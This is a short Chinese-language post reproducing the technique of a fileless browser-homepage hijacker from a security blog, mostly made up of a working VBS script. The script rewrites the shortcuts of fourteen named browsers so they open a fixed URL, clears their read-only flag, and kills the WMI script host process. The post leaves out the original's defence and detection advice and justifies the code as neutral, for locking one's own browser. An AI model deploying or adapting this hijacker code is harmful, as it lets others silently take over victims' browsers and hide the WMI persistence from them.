|
From:
http://blog.zemana.com/2016/04/yeabestscc-fileless-browser-hijacker_24.html
---
0x00 简介
vbs脚本,执行后可修改当前系统中常见浏览器的主页
通过wmi定时调用此脚本可实现无文件劫持浏览器主页
原文已给出防御和检测方法,所以此处略
---
0x01 应用
技术不分好坏
我们学习了这个技巧同样可以用来锁定自己的浏览器
vbs代码如下,主页锁定为http://www.baidu.com
- Dim objFS
- Set objFS = CreateObject("Scripting.FileSystemObject")
- On Error Resume Next
- Const link = "http://www.baidu.com"
- browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe")
- Set BrowserDic = CreateObject("scripting.dictionary")
- For Each browser In browsers
- BrowserDic.Add LCase(browser), browser
- Next
- Dim FoldersDic(12)
- Set WshShell = CreateObject("Wscript.Shell")
- FoldersDic(0) = "C:\Users\Public\Desktop"
- FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu"
- FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
- FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
- FoldersDic(4) = "C:\Users\a\Desktop"
- FoldersDic(5) = "C:\Users\a\AppData\Roaming\Microsoft\Windows\Start Menu"
- FoldersDic(6) = "C:\Users\a\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
- FoldersDic(7) = "C:\Users\a\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
- FoldersDic(8) = "C:\Users\a\AppData\Roaming"
- FoldersDic(9) = "C:\Users\a\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
- FoldersDic(10) = "C:\Users\a\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu"
- FoldersDic(11) = "C:\Users\a\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar"
- Set fso = CreateObject("Scripting.Filesystemobject")
- For i = 0 To UBound(FoldersDic)
- For Each file In fso.GetFolder(FoldersDic(i)).Files
- If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
- set oShellLink = WshShell.CreateShortcut(file.Path)
- path = oShellLink.TargetPath
- name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
- If BrowserDic.Exists(LCase(name)) Then
- oShellLink.Arguments = link
- If file.Attributes And 1 Then
- file.Attributes = file.Attributes - 1
- End If
- oShellLink.Save
- End If
- End If
- Next
- Next
- createobject("wscript.shell").run "cmd /c taskkill /f /im scrcons.exe", 0
复制代码
执行后会更改系统中浏览器的主页,如图
---
仅作测试,不许抄作业,后果自负
|
|